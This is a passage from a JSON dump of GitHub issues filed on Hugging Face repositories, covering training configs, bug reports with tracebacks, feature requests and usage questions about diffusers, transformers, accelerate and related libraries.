16\r\nmax_steps: -1\r\nnum_train_epochs: 1\r\noutput_dir: /~/alignment-handbook/experiments/models/llama3\r\noverwrite_output_dir: true\r\nper_device_eval_batch_size: 1\r\nper_device_train_batch_size: 1 # this is per device, you need to manual calculate global batch by per device * gas * gpu * node\r\ngradient_accumulation_steps: 8\r\npush_to_hub: false\r\nremove_unused_columns: true\r\nreport_to:\r\n- wandb # - tensorboard\r\nsave_strategy: \"steps\"\r\nsave_steps: 500\r\ntorch_empty_cache_steps: 500\r\nsave_total_limit: 30\r\nseed: 42\r\nwarmup_ratio: 0.1\r\n```\r\n\r\n- training launch script (brief version)\r\n```sh\r\n\r\n#!/bin/bash\r\n\r\n#SBATCH --job-name=train\r\n#SBATCH --nodes=2\r\n#SBATCH --ntasks-per-node=1\r\n#SBATCH --gpus-per-node=4\r\n#SBATCH --gpus-per-task=4\r\n#SBATCH --cpus-per-task=32\r\n#SBATCH --mem=512gb\r\n#SBATCH --time=96:00:00\r\n#SBATCH --output=output\r\n#SBATCH --partition=batch\r\n\r\n# apptainer\r\nCONTAINER=pt2402.sif\r\nTRAIN_CONF=config.yaml\r\nDEEPSPEED_CONF=deepspeed_zs2.json\r\nCMD=torchrun \\\r\n --nproc_per_node=$SLURM_GPUS_ON_NODE \\\r\n --nnode=$SLURM_JOB_NUM_NODES \\\r\n --node_rank=$SLURM_NODEID \\\r\n --master_addr=$PRIMARY \\\r\n --master_port=$PRIMARY_PORT \\\r\n ${ROOT}/scripts/run_sft.py \\\r\n $TRAIN_CONF \\\r\n --deepspeed=$DEEPSPEED_CONF \\\r\n --tee=3\r\n\r\nsrun --jobid $SLURM_JOB_ID apptainer exec --nv $CONTAINER bash -c $CMD\r\n```\r\n\r\n- deepspeed config:\r\n```json\r\n{\r\n \"fp16\": {\r\n \"enabled\": false,\r\n \"loss_scale\": 0,\r\n \"auto_cast\": false,\r\n \"loss_scale_window\": 1000,\r\n \"initial_scale_power\": 16,\r\n \"hysteresis\": 2,\r\n \"consecutive_hysteresis\": false,\r\n \"min_loss_scale\": 1\r\n },\r\n\r\n \"bf16\": {\r\n \"enabled\": true\r\n },\r\n\r\n \"optimizer\": {\r\n \"type\": \"AdamW\",\r\n \"params\": {\r\n \"lr\": \"auto\",\r\n \"weight_decay\": \"auto\",\r\n \"betas\": \"auto\",\r\n \"eps\": \"auto\",\r\n \"torch_adam\": true,\r\n \"adam_w_mode\": true\r\n }\r\n },\r\n\r\n \"scheduler\": {\r\n \"type\": \"WarmupDecayLR\",\r\n \"params\": {\r\n \"warmup_min_lr\": 1e-8,\r\n \"warmup_max_lr\": \"auto\",\r\n \"warmup_num_steps\": \"auto\",\r\n \"total_num_steps\": \"auto\"\r\n }\r\n }", "url": "https://github.com/huggingface/alignment-handbook/issues/201", "state": "closed", "labels": [], "created_at": "2024-10-15T15:04:18Z", "updated_at": "2024-10-17T18:56:53Z", "comments": 2, "user": "xiyang-aads-lilly" }, { "repo": "huggingface/chat-ui", "number": 1522, "title": "Add example prompt field to tools", "body": "## Describe your feature request\r\n\r\nThis lets the user specify a prompt that would call the tool. It can be shown as a demo if you're not sure how to use a tool. \r\n\r\nWe should show it somewhere in the UI so the user can easily start a conversation from that demo. \r\n\r\nIt can also be used for validating that a tool works. (run the example server-side, if the tool does not get called or does not return an output then something is wrong and dont let users publish it)\r\n\r\n## Implementation idea\r\n\r\nStoring the prompt itself is straightforward since you can just store it as a string. 
Most tools use file inputs, though, so we should ideally also support that, which means storing example files in the DB.", "url": "https://github.com/huggingface/chat-ui/issues/1522", "state": "open", "labels": [ "enhancement", "front", "back", "tools" ], "created_at": "2024-10-15T12:42:42Z", "updated_at": "2024-10-15T12:42:43Z", "comments": 0, "user": "nsarrazin" }, { "repo": "huggingface/optimum", "number": 2060, "title": "Support int8 tinyllama tflite export.", "body": "### Feature request\n\nA tflite exporter for decoder-only LLMs such as tinyllama.\n\n### Motivation\n\nSome platforms only support full int8 ops, so only full int8 tflite models can be deployed. Is there a support plan? Looking forward to your reply, thank you.\n\n### Your contribution\n\nno", "url": "https://github.com/huggingface/optimum/issues/2060", "state": "closed", "labels": [ "feature-request", "Stale" ], "created_at": "2024-10-15T03:25:54Z", "updated_at": "2024-12-09T02:11:36Z", "comments": 1, "user": "hayyaw" }, { "repo": "huggingface/diffusers", "number": 9673, "title": "high cpu usage when loading multiple loras at once.", "body": "### Describe the bug\r\n\r\nHi, I was building a synthesis system using celery and diffusers, \r\nand I found that the CPU usage of the program spikes when loading LoRAs.\r\nIt is okay when I use just one worker, but it becomes a problem when using 8 workers at once.\r\n\r\nIt happens when a LoRA is loaded for the first time, and I think it is because of peft, since I didn't have any trouble before peft support.\r\n\r\nSo is there any way to lower CPU usage when loading LoRAs? Or is there any way not to use peft when loading SDXL LoRAs?\r\n\r\n### Reproduction\r\n\r\n```python\r\n# test lora downloaded from https://civitai.com/models/150986/blueprintify-sd-xl-10\r\n\r\nfrom diffusers import AutoPipelineForText2Image\r\nimport torch\r\nfrom uuid import uuid4\r\nfrom tqdm import tqdm\r\n\r\npipeline = AutoPipelineForText2Image.from_pretrained(\"stabilityai/stable-diffusion-xl-base-1.0\", torch_dtype=torch.float16).to(\"cuda\")\r\nnum_of_iterations = 10\r\n\r\n\r\nfor _ in tqdm(range(num_of_iterations)):\r\n    lora_name = str(uuid4().hex)\r\n    pipeline.load_lora_weights(\r\n        \"./test\",\r\n        weight_name=\"lora.safetensors\",\r\n        adapter_name=lora_name,\r\n        low_cpu_mem_usage=True,\r\n    )\r\n    pipeline.set_adapters([lora_name], adapter_weights=[1.0])\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\ntorch==2.1.1+cu121\r\ndiffusers==0.30.3\r\naccelerate==0.32.1\r\npeft==0.13.0\r\ntransformers==4.42.3\r\npython==3.9.5\r\n\r\n### Who can help?\r\n\r\n@sayakpaul", "url": "https://github.com/huggingface/diffusers/issues/9673", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-15T01:49:37Z", "updated_at": "2024-10-15T05:07:40Z", "comments": 5, "user": "gudwns1215" }, { "repo": "huggingface/datasets", "number": 7226, "title": "Add R as a How to use from the Polars (R) Library as an option", "body": "### Feature request\r\n\r\nThe boilerplate code to access a dataset via the Hugging Face file system is very useful. 
Please add it.\r\n\r\n\r\n## Add Polars (R) option\r\nThe equivalent code works, because the [Polars-R](https://github.com/pola-rs/r-polars) wrapper has the Hugging Face functionality as well.\r\n\r\n```r\r\nlibrary(polars)\r\n\r\ndf <- pl$read_parquet(\"hf://datasets/SALURBAL/core__admin_cube_public/core__admin_cube_public.parquet\")\r\n```\r\n\r\n## Polars (python) option\r\n![image](https://github.com/user-attachments/assets/8f1bcd19-e578-4b18-b324-7cc00b80ac0a)\r\n\r\n\r\n## Libraries Currently\r\n\r\n![image](https://github.com/user-attachments/assets/0cf50063-f9db-443c-97b4-3ef0664b6e6e)\r\n\r\n\r\n\r\n\r\n### Motivation\r\n\r\nThere are many data/analysis/research/statistics teams (particularly in academia and pharma) that use R as the default language. R has great integration with most of the newer data techs (arrow, parquet, polars), and having this included could really help in bringing this community into the Hugging Face ecosystem.\r\n\r\n**This is a small/low-hanging-fruit front end change but would make a big impact expanding the community**\r\n\r\n### Your contribution\r\n\r\nI am not sure which repository this should be in, but I have experience in R, Python and JS and am happy to submit a PR in the appropriate repository. ", "url": "https://github.com/huggingface/datasets/issues/7226", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-10-14T19:56:07Z", "updated_at": "2024-10-14T19:57:13Z", "user": "ran-codes" }, { "repo": "huggingface/lerobot", "number": 472, "title": "How to resume training with more offline steps than initially set up?", "body": "### System Info\n\n```Shell\n- `lerobot` version: unknown\r\n- Platform: Linux-6.8.0-45-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.13\r\n- Huggingface_hub version: 0.25.2\r\n- Dataset version: 3.0.1\r\n- Numpy version: 1.26.4\r\n- PyTorch version (GPU?): 2.4.1 (True)\r\n- Cuda version: 11080\r\n- Using GPU in script?: \n```\n\n\n### Information\n\n- [X] One of the scripts in the examples/ folder of LeRobot\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n1. python lerobot/scripts/train.py \\\r\n hydra.run.dir=outputs/train/pusht\\\r\n device=cuda\r\n env=pusht_act \\\r\n env.task=pusht-v0 \\\r\n dataset_repo_id= takuzennn/pusht_v0 \\\r\n policy=act_pusht \\\r\n training.eval_freq=2000 \\\r\n training.log_freq=250 \\\r\n training.offline_steps=300000 \\\r\n training.save_model=true \\\r\n training.save_freq=2000 \\\r\n eval.n_episodes=30 \\\r\n eval.batch_size=12 \\\r\n wandb.enable=true \\\r\n\r\n2. python lerobot/scripts/train.py \\\r\n hydra.run.dir=outputs/train/pusht \\\r\n training.offline_steps=800000 \\\r\n resume=true\n\n### Expected behavior\n\nI expect it to stop at 800000 steps, but it still stops at 300000 steps.", "url": "https://github.com/huggingface/lerobot/issues/472", "state": "closed", "labels": [], "created_at": "2024-10-13T19:28:04Z", "updated_at": "2024-10-22T05:51:42Z", "user": "Takuzenn" }, { "repo": "huggingface/transformers.js", "number": 973, "title": "I would like to help ", "body": "### Question\r\n\r\nHi, I would like to help with the project. Is there anything that needs to be done?\r\n\r\nI found an issue, probably in ONNXRuntime. I will look into it next week. \r\n\r\nHere is an example of WebGPU Whisper that works on mobile platforms including iPhone and Android: https://github.com/FL33TW00D/whisper-turbo\r\n\r\nThe current Transformers.js solution has some bugs. It will crash after model loading; the page will restart on a mobile device. 
I tried to connect remote debugging to Chrome on my PC via an iOS remote debugging bridge, but it just restarts and I cannot get any logs. Any help on how to get logs would be appreciated, as I don't have much experience with iOS Safari debugging and I also happen to have a Windows PC.\r\n\r\nHere is a photo from Safari on iPhone; you can see it does not support float32, only float16. I suspect this is the issue, and there are about 3 separate pull requests in ONNX to fix something around float16 support. But I did not have time to merge all current ONNX PRs and build it yet. First I would like to see some log with the actual error.\r\n![webgpu](https://github.com/user-attachments/assets/f1688652-3666-4619-a8ee-3f5949d5833a)\r\n\r\nThis is what I will be working on next weekend.\r\n\r\nIf there is something else I should look into or help with testing, let me know.\r\n\r\nThank you for the great project and great work! :-)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/973", "state": "open", "labels": [ "question" ], "created_at": "2024-10-12T20:29:07Z", "updated_at": "2024-10-14T19:37:51Z", "user": "cyberluke" }, { "repo": "huggingface/diffusers", "number": 9661, "title": "from_pretrained: filename argument removed?", "body": "**What API design would you like to have changed or added to the library? Why?**\r\n\r\nI do believe there was a `filename` argument in the past to load a specific checkpoint in a huggingface repository. It appears that this has been removed with no replacement.\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\n\r\nIt's impossible to use any of the checkpoints here https://huggingface.co/SG161222/Realistic_Vision_V6.0_B1_noVAE/tree/main without manually downloading and using `from_single_file`. The checkpoint I want to load is called `Realistic_Vision_V6.0_NV_B1_fp16.safetensors`, but it seems that the procedure in `from_pretrained` tries to force and impose a specific name on the user. I understand the need for standards, but many have not respected the standards in the past, and now these models cannot be used without additional work.", "url": "https://github.com/huggingface/diffusers/issues/9661", "state": "closed", "labels": [ "stale" ], "created_at": "2024-10-12T20:02:31Z", "updated_at": "2024-11-13T00:37:52Z", "comments": 4, "user": "oxysoft" }, { "repo": "huggingface/transformers", "number": 34107, "title": "How to specify customized force_token_ids in whisper", "body": "```\r\nValueError: A custom logits processor of type with values has been passed to `.generate()`, but it has already been created with the values . has been created by passing the corresponding arguments to generate or by the model's config default values. If you just want to change the default values of logits processor consider passing them as arguments to `.generate()` instead of using a custom logits processor\r\n```\r\n\r\nThis way doesn't work:\r\n\r\n```\r\ninputs = inputs.to(self.model.dtype)\r\nwith torch.no_grad():\r\n    if forced_decoder_ids is not None:\r\n        generated_ids = self.model.generate(\r\n            inputs, forced_decoder_ids=forced_decoder_ids\r\n        )\r\n    else:\r\n        generated_ids = self.model.generate(inputs)\r\n```", "url": "https://github.com/huggingface/transformers/issues/34107", "state": "closed", "labels": [ "Generation", "Audio" ], "created_at": "2024-10-12T07:34:38Z", "updated_at": "2024-12-28T08:06:48Z", "user": "MonolithFoundation" }, { "repo": "huggingface/finetrainers", "number": 25, "title": "How to fix it? 
training/cogvideox_text_to_video_lora.py FAILED", "body": "### System Info / \u7cfb\u7d71\u4fe1\u606f\n\ncuda11.8\r\nx2 3090\r\nlinux ubuntu 22.04 lts\r\npytorch2.4\r\n\r\n\n\n### Information / \u95ee\u9898\u4fe1\u606f\n\n- [X] The official example scripts / \u5b98\u65b9\u7684\u793a\u4f8b\u811a\u672c\n- [X] My own modified scripts / \u6211\u81ea\u5df1\u4fee\u6539\u7684\u811a\u672c\u548c\u4efb\u52a1\n\n### Reproduction / \u590d\u73b0\u8fc7\u7a0b\n\nandb: You can sync this run to the cloud by running:\r\nwandb: wandb sync /home/dev_ml/cogvideox-factory/wandb/offline-run-20241011_154425-t76nveyh\r\nwandb: Find logs at: wandb/offline-run-20241011_154425-t76nveyh/logs\r\n[rank0]:I1011 15:44:57.956000 124307873129088 torch/_dynamo/utils.py:335] TorchDynamo compilation metrics:\r\n[rank0]:I1011 15:44:57.956000 124307873129088 torch/_dynamo/utils.py:335] Function, Runtimes (s)\r\n[rank0]:V1011 15:44:57.956000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats constrain_symbol_range: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.956000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats evaluate_expr: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _simplify_floor_div: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _maybe_guard_rel: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _find: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats has_hint: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats size_hint: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats simplify: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _update_divisible: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats replace: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.957000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats _maybe_evaluate_static: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.958000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats get_implications: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.958000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats get_axioms: CacheInfo(hits=0, misses=0, maxsize=None, currsize=0)\r\n[rank0]:V1011 15:44:57.958000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats safe_expand: CacheInfo(hits=0, misses=0, maxsize=256, currsize=0)\r\n[rank0]:V1011 15:44:57.958000 124307873129088 torch/fx/experimental/symbolic_shapes.py:116] lru_cache_stats uninteresting_files: CacheInfo(hits=0, 
misses=0, maxsize=None, currsize=0)\r\nW1011 15:45:01.515000 129677780091520 torch/distributed/elastic/multiprocessing/api.py:858] Sending process 177223 closing signal SIGTERM\r\nE1011 15:45:02.282000 129677780091520 torch/distributed/elastic/multiprocessing/api.py:833] failed (exitcode: 1) local_rank: 0 (pid: 177222) of binary: /home/dev_ml/cogvideox-factory/venv/bin/python3.10\r\nTraceback (most recent call last):\r\n File \"/home/dev_ml/cogvideox-factory/venv/bin/accelerate\", line 8, in \r\n sys.exit(main())\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/accelerate/commands/accelerate_cli.py\", line 48, in main\r\n args.func(args)\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/accelerate/commands/launch.py\", line 1159, in launch_command\r\n multi_gpu_launcher(args)\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/accelerate/commands/launch.py\", line 793, in multi_gpu_launcher\r\n distrib_run.run(args)\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/torch/distributed/run.py\", line 892, in run\r\n elastic_launch(\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/torch/distributed/launcher/api.py\", line 133, in __call__\r\n return launch_agent(self._config, self._entrypoint, list(args))\r\n File \"/home/dev_ml/cogvideox-factory/venv/lib/python3.10/site-packages/torch/distributed/launcher/api.py\", line 264, in launch_agent\r\n raise ChildFailedError(\r\ntorch.distributed.elastic.multiprocessing.errors.ChildFailedError: \r\n============================================================\r\ntraining/cogvideox_text_to_video_lora.py FAILED\r\n---------------------------------", "url": "https://github.com/huggingface/finetrainers/issues/25", "state": "closed", "labels": [], "created_at": "2024-10-11T08:49:23Z", "updated_at": "2024-12-23T07:40:41Z", "user": "D-Mad" }, { "repo": "huggingface/finetrainers", "number": 22, "title": "What resolution size is recommended for MP4 videos? What should the bitrate be set to? Should the video use H.264 or H.265 encoding?", "body": "About Dataset Preparation, \r\nWhat resolution size is recommended for MP4 videos? What should the bitrate be set to? Should the video use H.264 or H.265 encoding?\r\nexample\uff1a 1280X720, 5mbps below. 
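For the Whisper `forced_token_ids` question further above (huggingface/transformers#34107), a minimal sketch of the approach the ValueError points at: let `generate()` build the forced decoder prompt itself by passing `language`/`task`, instead of supplying `forced_decoder_ids` alongside the internally created logits processor. The model id and the silent dummy clip are stand-ins:

```python
import numpy as np
import torch
from transformers import WhisperForConditionalGeneration, WhisperProcessor

processor = WhisperProcessor.from_pretrained("openai/whisper-tiny")
model = WhisperForConditionalGeneration.from_pretrained("openai/whisper-tiny")

audio = np.zeros(16_000, dtype=np.float32)  # stand-in for one second of real 16 kHz audio
inputs = processor(audio, sampling_rate=16_000, return_tensors="pt").input_features

with torch.no_grad():
    # generate() derives the forced tokens from language/task on its own,
    # avoiding the "custom logits processor ... already been created" clash
    generated_ids = model.generate(inputs, language="en", task="transcribe")

print(processor.batch_decode(generated_ids, skip_special_tokens=True)[0])
```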
recommended H.264 encoder.\r\n\r\nIs any suggestion here?", "url": "https://github.com/huggingface/finetrainers/issues/22", "state": "closed", "labels": [], "created_at": "2024-10-11T05:12:57Z", "updated_at": "2024-10-14T07:20:36Z", "user": "Erwin11" }, { "repo": "huggingface/accelerate", "number": 3156, "title": "how to load model with fp8 precision for inference?", "body": "### System Info\n\n```Shell\nis it posible to load the model using accelerate library with fp8 inference?\r\ni have H100 gpu accesses.\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [X] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\n```\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\r\n\r\nmodel_name = \"Qwen/Qwen2.5-72B-Instruct\"\r\n\r\nmodel = AutoModelForCausalLM.from_pretrained(\r\n model_name,\r\n torch_dtype=\"auto\",\r\n device_map=\"auto\"\r\n)\r\ntokenizer = AutoTokenizer.from_pretrained(model_name)\r\n\r\nprompt = \"Give me a short introduction to large language model.\"\r\nmessages = [\r\n {\"role\": \"system\", \"content\": \"You are Qwen, created by Alibaba Cloud. You are a helpful assistant.\"},\r\n {\"role\": \"user\", \"content\": prompt}\r\n]\r\ntext = tokenizer.apply_chat_template(\r\n messages,\r\n tokenize=False,\r\n add_generation_prompt=True\r\n)\r\nmodel_inputs = tokenizer([text], return_tensors=\"pt\").to(model.device)\r\n\r\ngenerated_ids = model.generate(\r\n **model_inputs,\r\n max_new_tokens=512\r\n)\r\ngenerated_ids = [\r\n output_ids[len(input_ids):] for input_ids, output_ids in zip(model_inputs.input_ids, generated_ids)\r\n]\r\n\r\nresponse = tokenizer.batch_decode(generated_ids, skip_special_tokens=True)[0]\r\n\r\n```\n\n### Expected behavior\n\n...", "url": "https://github.com/huggingface/accelerate/issues/3156", "state": "closed", "labels": [], "created_at": "2024-10-11T04:31:47Z", "updated_at": "2024-12-02T15:07:58Z", "user": "imrankh46" }, { "repo": "huggingface/diffusers", "number": 9643, "title": "Flux does not support multiple Controlnets?", "body": "### Describe the bug\r\n\r\nI'm encountering an issue with the FluxControlNetPipeline. The `controlnet` parameter is supposed to accept a `List[FluxControlNetModel]`. 
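Returning to the fp8 question above (huggingface/accelerate#3156), a hedged sketch using transformers' `FbgemmFp8Config`; this assumes a recent transformers release with `fbgemm-gpu` installed and fp8-capable hardware such as the H100 mentioned in the report:

```python
from transformers import AutoModelForCausalLM, AutoTokenizer, FbgemmFp8Config

model_name = "Qwen/Qwen2.5-72B-Instruct"

# weights are quantized to fp8 on the fly at load time
model = AutoModelForCausalLM.from_pretrained(
    model_name,
    quantization_config=FbgemmFp8Config(),
    device_map="auto",
)
tokenizer = AutoTokenizer.from_pretrained(model_name)
```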
However, when I attempt to execute my code, I run into the following error:\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"/opt/tiger/test_1/h.py\", line 8, in \r\n pipe = FluxControlNetPipeline.from_pretrained('/mnt/bn/x/sd_models/flux_schnell/', controlnet=controlnet, torch_dtype=torch.bfloat16).to(\"cuda\")\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\r\n return fn(*args, **kwargs)\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 940, in from_pretrained\r\n model = pipeline_class(**init_kwargs)\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/diffusers/pipelines/flux/pipeline_flux_controlnet.py\", line 206, in __init__\r\n self.register_modules(\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py\", line 162, in register_modules\r\n library, class_name = _fetch_class_library_tuple(module)\r\n File \"/opt/tiger/miniconda3/lib/python3.10/site-packages/diffusers/pipelines/pipeline_loading_utils.py\", line 731, in _fetch_class_library_tuple\r\n library = not_compiled_module.__module__.split(\".\")[0]\r\nAttributeError: 'list' object has no attribute '__module__'. Did you mean: '__mul__'?\r\n```\r\n\r\n### Reproduction\r\n\r\n```\r\nimport torch\r\nfrom diffusers import FluxControlNetPipeline, FluxControlNetModel\r\n\r\ncontrolnet = [\r\n FluxControlNetModel.from_pretrained(\"InstantX/FLUX.1-dev-controlnet-canny\", torch_dtype=torch.bfloat16),\r\n FluxControlNetModel.from_pretrained(\"InstantX/FLUX.1-dev-controlnet-canny\", torch_dtype=torch.bfloat16),\r\n]\r\npipe = FluxControlNetPipeline.from_pretrained('/mnt/bn/x/sd_models/flux_schnell/', controlnet=controlnet, torch_dtype=torch.bfloat16).to(\"cuda\")\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\n- \ud83e\udd17 Diffusers version: 0.31.0.dev0\r\n- Platform: Linux-5.4.143.bsk.7-amd64-x86_64-with-glibc2.31\r\n- Running on Google Colab?: No\r\n- Python version: 3.10.14\r\n- PyTorch version (GPU?): 2.3.1+cu121 (True)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Huggingface_hub version: 0.24.5\r\n- Transformers version: 4.38.2\r\n- Accelerate version: 0.33.0\r\n- PEFT version: 0.12.0\r\n- Bitsandbytes version: 0.44.1\r\n- Safetensors version: 0.4.4\r\n- xFormers version: 0.0.27\r\n- Accelerator: NVIDIA A100-SXM4-80GB, 81920 MiB\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9643", "state": "closed", "labels": [ "bug" ], "created_at": "2024-10-11T03:47:06Z", "updated_at": "2024-10-11T17:39:20Z", "comments": 1, "user": "RimoChan" }, { "repo": "huggingface/diffusers", "number": 9639, "title": "How to use my own trained lora in local computer?", "body": "local_model_path = r\"D:\\downloads\\FLUX.1-schnell\"\r\npipe = FluxPipeline.from_pretrained(local_model_path, torch_dtype=torch.bfloat16)\r\n#lora not working by this way\r\npipe.load_lora_weights(\"XLabs-AI/flux-lora-collection\", weight_name=\"disney_lora.safetensors\") \r\npipe.load_lora_weights(r\"D:\\AI\\stable-diffusion-webui-forge\\models\\Lora\\myflux\\myhsr.safetensors\")\r\npipe.fuse_lora()\r\npipe.unload_lora_weights()\r\n#pipe.enable_model_cpu_offload() #save some VRAM by offloading the model to CPU. 
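For the multi-ControlNet traceback above: `register_modules` receives the plain Python list, which has no `__module__`, hence the AttributeError. A sketch of the wrapper available in recent diffusers releases, assuming `FluxMultiControlNetModel` exists in your installed version (the hub repo id stands in for the local `flux_schnell` path from the report):

```python
import torch
from diffusers import (
    FluxControlNetModel,
    FluxControlNetPipeline,
    FluxMultiControlNetModel,
)

controlnets = [
    FluxControlNetModel.from_pretrained(
        "InstantX/FLUX.1-dev-controlnet-canny", torch_dtype=torch.bfloat16
    ),
    FluxControlNetModel.from_pretrained(
        "InstantX/FLUX.1-dev-controlnet-canny", torch_dtype=torch.bfloat16
    ),
]

# wrap the list in a single nn.Module so register_modules can inspect it
controlnet = FluxMultiControlNetModel(controlnets)
pipe = FluxControlNetPipeline.from_pretrained(
    "black-forest-labs/FLUX.1-dev", controlnet=controlnet, torch_dtype=torch.bfloat16
).to("cuda")
```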
Remove this if you have enough GPU power\r\npipe.enable_sequential_cpu_offload()\r\n\r\nBut it seems not loading my own lora properly.", "url": "https://github.com/huggingface/diffusers/issues/9639", "state": "closed", "labels": [], "created_at": "2024-10-10T23:19:47Z", "updated_at": "2024-11-10T08:49:08Z", "user": "derekcbr" }, { "repo": "huggingface/evaluation-guidebook", "number": 14, "title": "[TOPIC] How to design a good benchmark depending on your eval goals", "body": " Eval goals can be finding a good model for you vs ranking models vs choosing a good training config.\r\n \r\n Request by Luca Soldaini\r\n \r\n Cf https://x.com/soldni/status/1844409854712218042", "url": "https://github.com/huggingface/evaluation-guidebook/issues/14", "state": "closed", "labels": [], "created_at": "2024-10-10T16:20:40Z", "updated_at": "2025-09-18T08:31:15Z", "user": "clefourrier" }, { "repo": "huggingface/diffusers", "number": 9633, "title": "Confusion about accelerator.num_processes in get_scheduler", "body": "In the example code from [train_text_to_image_sdxl.py](https://github.com/huggingface/diffusers/blob/e16fd93d0a40156c1f49fde07f6f2eb438983927/examples/text_to_image/train_text_to_image_sdxl.py#L974):\r\n```python\r\nnum_warmup_steps = args.lr_warmup_steps * args.gradient_accumulation_steps\r\n```\r\nBut in [train_text_to_image.py](https://github.com/huggingface/diffusers/blob/e16fd93d0a40156c1f49fde07f6f2eb438983927/examples/text_to_image/train_text_to_image.py#L830):\r\n```python\r\nnum_warmup_steps_for_scheduler = args.lr_warmup_steps * accelerator.num_processes\r\n```\r\nWhy is there such a difference in these two cases?", "url": "https://github.com/huggingface/diffusers/issues/9633", "state": "closed", "labels": [ "stale" ], "created_at": "2024-10-10T08:39:12Z", "updated_at": "2024-11-09T15:37:33Z", "comments": 5, "user": "hj13-mtlab" }, { "repo": "huggingface/transformers.js", "number": 968, "title": "It's ready", "body": "### Question\r\n\r\nThe project I've been working on for the part few months is now ready-enough to reveal to the world. Transformers.js is an essential part of it, and I just want to say thank you for your amazing work.\r\n\r\nhttps://www.papeg.ai\r\n\r\nAs you can see in the source code, there are lots of workers that implement Transformers.js workers; translation, image description, STT, TTS, speaker verification, image- and music generation, RAG embedding, and more!\r\n\r\nhttps://github.com/flatsiedatsie/papeg_ai\r\n\r\nKeep on rockin' !\r\n\r\n// Reddit post: https://www.reddit.com/r/LocalLLaMA/comments/1g0jehn/ive_been_working_on_this_for_6_months_free_easy/\r\n\r\n(Feel free to close this issue at any time)", "url": "https://github.com/huggingface/transformers.js/issues/968", "state": "closed", "labels": [ "question" ], "created_at": "2024-10-10T04:39:48Z", "updated_at": "2025-05-29T22:49:24Z", "user": "flatsiedatsie" }, { "repo": "huggingface/datasets", "number": 7211, "title": "Describe only selected fields in README", "body": "### Feature request\n\nHi Datasets team! \r\n\r\nIs it possible to add the ability to describe only selected fields of the dataset files in `README.md`? For example, I have this open dataset ([open-llm-leaderboard/results](https://huggingface.co/datasets/open-llm-leaderboard/results?row=0)) and I want to describe only some fields in order not to overcomplicate the Dataset Preview and filter out some fields \n\n### Motivation\n\nThe `Results` dataset for the Open LLM Leaderboard contains json files with a complex nested structure. 
